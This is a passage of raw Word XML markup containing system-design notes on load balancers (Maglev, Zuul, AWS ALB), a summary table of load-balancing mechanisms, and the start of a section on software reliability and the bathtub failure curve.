        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google's Maglev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DEE32" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Distributed L4 load balancer running on commodity Linux servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587F45D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Uses ECMP: routers distribute packets across Maglev instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB68BE4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Consistent hashing ensures packets of the same flow go to the same backend (even if they hit different Maglev instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2521B0A0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each Maglev instance can handle 10M+ packets/second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881BB46" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>No shared state between Maglev instances (each makes independent decisions using the same consistent hashing algorithm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA3B67" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netflix's Zuul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5C97D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>L7 edge gateway handling millions of RPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCFAFE7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Non-blocking I/O (Netty-based) for connection efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C158B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Filters: pre-routing (authentication, rate limiting), routing (backend selection), post-routing (header manipulation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F37386" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Integrates with Eureka (service discovery) for dynamic backend lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3C999" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Origin selection using zone affinity + subset selection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79DE67" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS Application Load Balancer (ALB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155FDDF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Managed L7 load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF90F94" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Automatically scales across multiple AZs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD78A1D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Content-based routing: host-based, path-based, header-based, query-string-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA6336" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Native integration with ECS, EKS, Lambda (can route to serverless).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CDEF1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>WebSocket support with connection persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1929A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>gRPC support (HTTP/2 aware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681E9A0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="68CDCCA8">
          <v:rect id="_x0000_i2689" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC6422" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3046"/>
        <w:gridCol w:w="6304"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="0C02780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CA515B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Concern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9FE434" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="28FDDD6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C490C5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Distribute traffic evenly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F2ADAE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Algorithms (Round Robin, Least Connections, Power of Two)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="31DB6B0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248A1F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Adapt to server capacity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D393D7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Weighted algorithms, slow start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="67F7629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A505A4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Handle server failures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D63D38" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Health checks (active + passive), automatic removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="1D2CDB2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8EEFA3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Maintain user sessions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8C0872" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Sticky sessions, cookie-based persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="124B826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E0238F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:lastRenderedPageBreak/>
              <w:t>Protect backends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C10E3A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Rate limiting, connection limits, circuit breaking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="1514E5C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D6F0F3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Scale globally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E68F51" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>GSLB (DNS, Anycast), multi-region routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="059B308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BFC47B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Avoid being a SPOF</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E17D93" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Active-passive (VRRP), active-active (ECMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="7210A94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A20A8E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Support modern protocols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7BBD0E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>L7 awareness (gRPC, WebSocket, HTTP/2 multiplexing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="75B8335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3A4DC1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Minimize latency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C5937E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Locality-aware routing, connection pooling, DSR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="40B44DC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95B5DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Enable deployments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6EE0D7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Connection draining, traffic splitting (canary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6017C10C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> A load balancer is not merely a traffic splitter — it's the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nervous system</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> of your infrastructure. It observes (health checks, metrics), decides (algorithms, routing rules), and acts (failover, draining, rate limiting). Its quality directly determines your system's availability, scalability, and user experience under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE70D10" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED1486" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="4A274D97">
          <v:rect id="_x0000_i2781" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039404F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Reliability Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64D245" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability is not availability. This distinction is critical and routinely conflated. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is the fraction of time a system is operational. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is the probability that a system performs its </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>intended function correctly, consistently, and without failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> over a specified time period under specified conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E3640E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A system can be highly available but completely unreliable — it responds to every request but returns wrong answers 10% of the time. A payment system that processes 99.9% of transactions but silently drops 0.1% is available but catastrophically unreliable. A recommendation engine that's always up but recommends products users already purchased is available but unreliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33823DC9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The formal definition from reliability engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689138D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BFBF4B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>R(t) = P(system performs correctly over interval [0, t])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A8D7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     = e^(-λt)    (for systems with constant failure rate λ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2EE51" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Where λ (lambda) is the failure rate — failures per unit time. This exponential decay model says: the longer a system runs, the lower the probability it hasn't failed yet. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>memoryless property</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> of exponential distributions — the probability of failure in the next hour is always λ, regardless of how long the system has been running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D8793" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>But software systems don't follow purely exponential failure distributions. They follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bathtub curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the same model used in hardware reliability engineering, adapted for software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6C679" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429195F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF56CF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272226F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FD0FE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |  \                                              /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112183DB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |   \    Burn-in        Useful Life          /  Wear-out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC2B65" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |    \   (early bugs)   (random failures)  /   (technical debt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA99C6E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |     \________________/________________/    scale limits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E30088" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C980957" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  +------------------------------------------------→ Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAB47B0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burn-in phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> High failure rate immediately after deployment. Software bugs surface under real traffic patterns that testing didn't cover. Configuration errors. Integration failures with production systems. Failure rate decreases as bugs are fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA303D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Useful life phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Approximately constant failure rate. Random, independent failures. Hardware faults, transient network issues, rare edge cases in code. This is the phase system reliability models assume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B494D07" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wear-out phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Increasing failure rate over time. In software: technical debt accumulation, data volume growing beyond original design assumptions, dependency libraries falling out of support, security vulnerabilities accumulating. Systems eventually need architectural renewal or replacement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D0092" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Understanding where your system sits on this curve determines your reliability engineering strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABEB22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="60D865C2">
          <v:rect id="_x0000_i2782" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B684833" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Failure Mode Analysis — How Systems Actually Fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6A5FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
